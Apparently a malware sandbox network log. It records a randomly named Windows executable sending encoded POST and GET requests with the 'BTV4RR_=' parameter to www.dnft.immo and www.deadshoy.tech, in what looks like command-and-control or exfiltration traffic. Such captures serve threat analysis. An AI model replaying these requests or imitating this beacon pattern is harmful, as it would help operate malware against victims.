                                                      set-cookie: parking_session=fd90465b-ca5e-4736-958b-cd3e36228181; expires=Fri, 13 Dec 2024 12:34:02 GMT; path=/
                                                      connection: close
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:02.747917891 CET | 555 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmQ5MDQ2NWItY2E1ZS00NzM2LTk1OGItY2QzZTM2MjI4MTgxIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      11 | 192.168.2.24 | 49795 | 199.59.243.227 | 80 | 6880 | C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 13:19:04.356589079 CET | 12360 | OUT | POST /yeky/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 45184
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.dnft.immo
                                                      Origin: http://www.dnft.immo
                                                      Referer: http://www.dnft.immo/yeky/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 32 4e 65 57 49 31 6a 63 59 6c 44 48 7a 31 77 74 77 4b 32 72 56 76 76 77 52 34 77 63 66 48 59 63 55 53 65 68 7a 63 6f 62 50 65 42 57 6c 2b 68 51 61 6e 41 65 68 79 39 51 33 43 30 37 76 7a 70 39 4d 6d 2b 39 51 53 4d 63 73 73 62 6f 52 35 63 79 44 61 61 58 64 31 75 38 66 5a 63 68 57 44 39 70 49 37 54 72 63 48 6c 38 34 72 76 61 52 30 53 4f 56 33 58 4a 53 47 30 39 62 76 2b 68 43 37 35 57 35 6e 68 68 30 43 41 33 4d 41 70 71 35 62 49 4d 53 4f 51 44 41 4f 73 48 6f 46 2f 75 53 6a 78 46 6b 6e 52 72 58 6b 56 45 50 50 2b 6f 34 66 2b 38 62 41 41 2b 46 47 37 4f 79 54 65 79 69 6b 79 70 63 79 70 69 39 6b 6c 6e 49 46 59 56 6f 70 4c 2b 32 38 33 5a 55 73 6e 6e 74 54 67 71 6c 35 5a 4a 6e 4a 52 54 70 41 63 79 33 79 48 6c 67 77 59 2f 76 31 77 4e 6a 7a 30 2f 69 4e 62 4a 56 31 2b 64 70 52 70 38 6d 63 6a 49 30 54 6b 4e 69 47 6b 6f 74 58 43 4c 6a 7a 69 67 43 38 69 2b 4d 73 6c 6e 32 6d 79 36 61 38 6f 73 7a 7a 34 61 65 42 4c 52 35 6a 6f 4d 75 75 74 66 2b 46 61 4a 53 44 77 6c 51 47 62 34 39 38 6d 75 48 37 [TRUNCATED]
                                                      Dec 13, 2024 13:19:05.742974997 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:05 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1102
                                                      x-request-id: f88236cc-1fca-48bd-be0b-4c28b2d52156
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                      set-cookie: parking_session=f88236cc-1fca-48bd-be0b-4c28b2d52156; expires=Fri, 13 Dec 2024 12:34:05 GMT; path=/
                                                      connection: close
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:05.743029118 CET | 555 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjg4MjM2Y2MtMWZjYS00OGJkLWJlMGItNGMyOGIyZDUyMTU2IiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      12 | 192.168.2.24 | 49796 | 199.59.243.227 | 80 | 6880 | C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 13:19:07.058255911 CET | 437 | OUT | GET /yeky/?BTV4RR_=7P22LBHaa1jf6nBK2o2gS6XOG6oCOldtUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadAxG5YrQIOX9iVafYKH1JxvTLehj3THGuTlQ=&Tr=F0udvf HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.dnft.immo
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Dec 13, 2024 13:19:08.143765926 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:07 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1438
                                                      x-request-id: e7cbbf35-f647-4888-88bb-9fe0e65786f0
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_L4jbO3WkqX7Vm7AM1lyL069PDUzMhByunrpJeLj72Z5zq1PSzqnvLFAWyWF4edeDWr48K9cZjp3vgxfpJkj29w==
                                                      set-cookie: parking_session=e7cbbf35-f647-4888-88bb-9fe0e65786f0; expires=Fri, 13 Dec 2024 12:34:07 GMT; path=/
                                                      connection: close
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_L4jbO3WkqX7Vm7AM1lyL069PDUzMhByunrpJeLj72Z5zq1PSzqnvLFAWyWF4edeDWr48K9cZjp3vgxfpJkj29w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:08.143809080 CET | 891 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTdjYmJmMzUtZjY0Ny00ODg4LTg4YmItOWZlMGU2NTc4NmYwIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                       Session ID:13
                                                       Source IP:192.168.2.24
                                                       Source Port:49797
                                                       Destination IP:199.59.243.227
                                                       Destination Port:80
                                                       PID:6880
                                                       Process:C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 13, 2024 13:19:14.020610094 CET | 713 | OUT | POST /0sq9/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 204
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.deadshoy.tech
                                                      Origin: http://www.deadshoy.tech
                                                      Referer: http://www.deadshoy.tech/0sq9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 39 6c 51 6a 31 4a 44 2b 75 77 59 38 38 64 7a 6e 5a 50 37 63 66 56 71 6e 62 4b 73 75 59 6a 67 74 56 69 4d 69 76 67 71 39 6a 39 42 33 61 64 72 48 49 4f 55 4f 2b 30 59 36 57 6a 4b 4f 59 4b 7a 68 4c 34 5a 75 2b 75 36 52 37 33 6d 6e 46 34 4c 51 4c 76 69 52 6b 47 32 36 4f 6e 77 45 6a 75 69 6b 76 4a 72 49 31 71 53 34 44 39 69 77 2b 65 57 70 6c 56 6c 72 58 62 71 53 2b 68 34 59 64 2b 4c 31 67 73 6c 31 6c 75 45 42 55 78 69 65 37 69 4c 75 4b 38 65 42 65 6c 50 53 62 66 34 7a 53 7a 47 64 6f 51 78 76 7a 73 6e 4a 65 42 61 32 2f 68 63 6a 2b 66 4d 74 4a 51 3d 3d
                                                      Data Ascii: BTV4RR_=9BEMgTjmi+A69lQj1JD+uwY88dznZP7cfVqnbKsuYjgtViMivgq9j9B3adrHIOUO+0Y6WjKOYKzhL4Zu+u6R73mnF4LQLviRkG26OnwEjuikvJrI1qS4D9iw+eWplVlrXbqS+h4Yd+L1gsl1luEBUxie7iLuK8eBelPSbf4zSzGdoQxvzsnJeBa2/hcj+fMtJQ==
                                                       Dec 13, 2024 13:19:15.100106955 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:14 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1118
                                                      x-request-id: 9846122a-ba1b-4b9d-a212-ab4e3bd1f313
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                      set-cookie: parking_session=9846122a-ba1b-4b9d-a212-ab4e3bd1f313; expires=Fri, 13 Dec 2024 12:34:14 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                       Dec 13, 2024 13:19:15.100208044 CET | 571 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTg0NjEyMmEtYmExYi00YjlkLWEyMTItYWI0ZTNiZDFmMzEzIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                       Session ID:14
                                                       Source IP:192.168.2.24
                                                       Source Port:49799
                                                       Destination IP:199.59.243.227
                                                       Destination Port:80
                                                       PID:6880
                                                       Process:C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 13, 2024 13:19:16.684420109 CET | 1085 | OUT | POST /0sq9/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 576
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.deadshoy.tech
                                                      Origin: http://www.deadshoy.tech
                                                      Referer: http://www.deadshoy.tech/0sq9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 2f 47 49 6a 30 72 72 2b 2f 51 59 7a 77 39 7a 6e 57 76 37 51 66 56 57 6e 62 4f 31 72 66 56 49 74 4d 48 6f 69 67 42 71 39 6d 39 42 33 55 39 72 43 46 75 55 4a 2b 30 63 49 57 6d 79 4f 59 4b 6e 68 4b 50 74 75 35 4f 36 53 2f 58 6d 69 54 6f 4c 62 52 66 69 49 6b 47 32 59 4f 6e 78 63 6a 72 2b 6b 6f 49 4c 49 6a 76 2b 34 44 39 69 36 68 75 57 32 33 6c 6c 4b 58 62 79 34 2b 6b 51 49 64 34 4c 31 67 4d 46 31 7a 75 45 4f 57 52 69 53 6a 79 4b 37 61 2b 72 37 65 47 6e 45 55 73 46 49 54 54 4c 39 69 41 52 31 2b 65 33 69 61 54 6e 58 34 55 4a 4c 72 4f 52 52 62 34 35 36 30 64 33 50 2b 6d 56 32 79 36 59 32 35 36 44 44 69 72 43 5a 33 53 67 6d 4b 2b 63 78 66 57 61 30 4a 56 67 58 6e 56 43 69 2f 68 68 6c 63 31 45 36 4c 38 4c 61 36 45 74 78 64 66 52 35 4e 35 41 71 4f 6b 59 50 51 6d 58 32 48 53 67 7a 79 49 6a 52 30 79 43 78 76 78 39 73 61 6f 70 38 32 39 70 69 75 42 67 79 35 31 59 51 6c 49 65 6f 6f 46 33 71 66 2b 68 51 2b 69 6e 53 5a 4b 4e 30 68 43 35 57 2b 6b 54 75 66 41 [TRUNCATED]
                                                       Data Ascii: BTV4RR_= [TRUNCATED]
                                                       Dec 13, 2024 13:19:17.765785933 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:17 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1118
                                                      x-request-id: 7f92b2f9-1870-4a12-9ad4-0b968bec2821
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                      set-cookie: parking_session=7f92b2f9-1870-4a12-9ad4-0b968bec2821; expires=Fri, 13 Dec 2024 12:34:17 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                       Dec 13, 2024 13:19:17.765820026 CET | 571 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2Y5MmIyZjktMTg3MC00YTEyLTlhZDQtMGI5NjhiZWMyODIxIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                       Session ID:15
                                                       Source IP:192.168.2.24
                                                       Source Port:49801
                                                       Destination IP:199.59.243.227
                                                       Destination Port:80
                                                       PID:6880
                                                       Process:C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 13, 2024 13:19:19.491897106 CET | 12360 | OUT | POST /0sq9/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 45184
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.deadshoy.tech
                                                      Origin: http://www.deadshoy.tech
                                                      Referer: http://www.deadshoy.tech/0sq9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 2f 47 49 6a 30 72 72 2b 2f 51 59 7a 77 39 7a 6e 57 76 37 51 66 56 57 6e 62 4f 31 72 66 56 77 74 51 6b 51 69 76 43 53 39 68 39 42 33 63 64 72 44 46 75 55 59 2b 77 77 4d 57 6d 33 37 59 49 66 68 4b 66 64 75 34 72 75 53 76 33 6d 68 53 6f 4c 52 4c 76 69 45 6b 47 47 2b 4f 6e 31 4d 6a 76 47 6b 75 36 54 49 6b 71 53 37 4a 64 69 77 2b 65 57 74 6c 56 6c 54 58 62 69 30 2b 6c 77 49 64 49 50 31 67 4f 39 31 6e 50 45 4f 57 78 69 53 6c 79 4c 2f 42 4f 33 47 65 47 6e 59 55 73 52 79 53 68 7a 39 6a 53 70 31 33 75 33 68 52 44 6e 52 37 55 4a 4a 36 65 52 57 62 34 68 36 30 59 54 50 2b 55 56 32 79 62 34 32 36 61 44 41 35 37 43 5a 38 79 67 6b 48 65 51 55 66 57 61 38 4a 55 31 79 6e 56 47 69 2b 41 68 6c 4b 55 45 37 63 4d 4c 5a 39 45 74 33 54 2f 52 76 4e 2b 49 59 4f 6b 51 50 58 53 50 32 48 42 34 7a 6b 37 62 53 79 69 43 38 6c 52 39 71 54 49 6b 51 32 39 52 6d 75 42 41 69 35 45 34 51 6c 4d 61 6f 73 47 76 71 49 2b 68 51 75 53 6e 55 58 71 4e 73 68 43 35 57 2b 6b 66 75 65 33 [TRUNCATED]
                                                       Data Ascii: BTV4RR_= [TRUNCATED]
                                                       Dec 13, 2024 13:19:19.611952066 CET | 4944 | OUT | Data Raw: 74 59 58 70 47 6e 4c 43 6f 6a 47 61 30 4c 51 43 45 72 72 74 4f 74 36 6d 76 73 38 6b 59 2b 47 34 41 79 70 73 59 2f 31 55 2b 47 2b 51 37 6e 4d 4f 4e 36 48 4b 55 57 54 4b 2b 6d 47 6c 44 66 7a 45 65 5a 53 66 41 48 66 51 4f 53 6a 59 4c 59 72 66 36 4b
                                                      Data Ascii: tYXpGnLCojGa0LQCErrtOt6mvs8kY+G4AypsY/1U+G+Q7nMON6HKUWTK+mGlDfzEeZSfAHfQOSjYLYrf6KlIQ50+LzMsl6zTaUxJVYwdbIb3gpM9ObJhKrBEFqnpk8EW/mBveGhO9enA7F56EW6AHrXxmMvMPJA6V7+zy46lX0TUk7uAoMuFBEABuVHyw/mlXuJ6U2AYGUhaTe2jhzmjgRsUZywRsa2HH+hZRQeUY/mrVI/H2W7
                                                       Dec 13, 2024 13:19:19.612026930 CET | 4944 | OUT | Data Raw: 47 54 6a 79 73 4c 4d 70 78 35 2b 51 67 36 4e 31 79 4d 77 6c 56 39 58 37 76 4f 50 49 7a 34 62 73 47 30 39 52 52 4d 53 39 4c 2f 49 30 5a 64 66 5a 58 4d 77 31 6f 53 65 43 32 56 2f 4b 78 73 69 74 55 5a 76 44 46 79 4f 76 6f 75 72 48 79 39 4c 70 56 30
                                                      Data Ascii: GTjysLMpx5+Qg6N1yMwlV9X7vOPIz4bsG09RRMS9L/I0ZdfZXMw1oSeC2V/KxsitUZvDFyOvourHy9LpV01uUk20FdK8BH7LBy6G1aqGCGGYmqxfvVTcvxNmKr6RZ3j0GRYBrctXHTzfv+GVcqx2QSWdSBqigFick2um5Ftpxy3Tpl3p2gTJM9uKPeheSlSFrSKuR9MRXEn4BJNexVW91P8P4EnjHEPNbm3RQlLbda87aAcKXOn
                                                       Dec 13, 2024 13:19:19.612180948 CET | 2472 | OUT | Data Raw: 42 59 6d 6a 55 44 31 64 4d 67 6d 41 78 48 6f 4f 70 2f 35 4c 38 58 6d 4a 57 41 67 51 48 67 55 6d 63 69 63 33 35 50 4c 50 4c 62 2b 39 34 4c 30 59 50 58 77 52 36 6d 48 6e 4b 61 74 59 71 77 56 63 2b 65 4a 6a 4b 6a 44 68 64 4f 6e 35 66 33 6a 6f 54 75
                                                      Data Ascii: BYmjUD1dMgmAxHoOp/5L8XmJWAgQHgUmcic35PLPLb+94L0YPXwR6mHnKatYqwVc+eJjKjDhdOn5f3joTuzIVTCH8jGpP2QFpaKwkbJzMYPyTlvtQsCRJaIZ1a1HyRJRAfpErIO76Ptu67iNO5k7ndNX4MMfowFfVWgoCNenCgie4G2ClINKNstMP2NdkvibNgyMuTv7b7FuWBR5f+SmH6vbGdMnRue8nRr7UBDFXb8j+2aOQWH
                                                       Dec 13, 2024 13:19:19.612238884 CET | 4944 | OUT | Data Raw: 53 47 67 4a 57 35 2f 4c 6d 65 4d 36 48 52 57 4e 34 45 70 68 41 30 38 77 46 31 41 49 52 65 58 57 6a 2b 71 75 57 43 4e 46 34 4a 2f 71 2f 63 71 4e 79 35 4c 35 68 45 41 79 31 69 4c 30 57 58 7a 64 65 61 41 66 4b 31 77 44 37 32 62 62 41 39 4a 6f 31 38
                                                      Data Ascii: SGgJW5/LmeM6HRWN4EphA08wF1AIReXWj+quWCNF4J/q/cqNy5L5hEAy1iL0WXzdeaAfK1wD72bbA9Jo18ZUytAgpeg34b9eoCPx9D3ctMnLrmY/B0RJLkjBE1P1ysxVppjbjMhcCSqyKn8lTtf4kpd+9JoasSLau1UC82k6EirVKX0nrjLBvihS+P/vpzg66am9R2XAa4u5fOQGufFGxdoJiu2CevJZKMxOfw6xocRPU9mrwK0
